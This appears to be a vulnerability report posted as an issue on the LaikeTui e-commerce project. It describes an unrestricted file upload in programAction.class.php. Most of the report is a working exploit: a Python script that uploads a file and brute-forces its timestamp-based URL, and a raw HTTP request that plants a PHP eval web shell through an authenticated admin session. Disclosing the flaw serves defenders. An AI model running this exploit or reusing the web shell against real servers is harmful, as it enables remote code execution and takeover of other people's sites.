LaikeTui icon indicating copy to clipboard operation
LaikeTui copied to clipboard

Published 20 hours ago verified publisher icon bettershop

There is a file upload getshell vulnerability in the background software/actions/programAction.class.php

Open S2eTo opened this issue 2 years ago • 0 comments

File Path: software/actions/programAction.class.php#L217

This method directly splices the unlimited extension in the file name into the file upload target file extension, and can upload the .php file getshell

image

But the file name is not sent to the page, but time() is used here to get the current time for splicing As long as the blasting is carried out back through the current event, under normal circumstances, the number of blasting will not exceed three times Below is the script I wrote in Python

image

import time
import socket
import requests

host = "127.0.0.1"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.recv(65535)
client.close()
end = int(time.time())

now = end
coast = end - start

print(f"now: {now}")
def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=add&name=1&image=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 237
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: admin_mojavi=23bgar1r1bq43q0ro3plbrj148; XDEBUG_SESSION=18445
Connection: close

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy

S2eTo avatar Nov 03 '22 16:11 S2eTo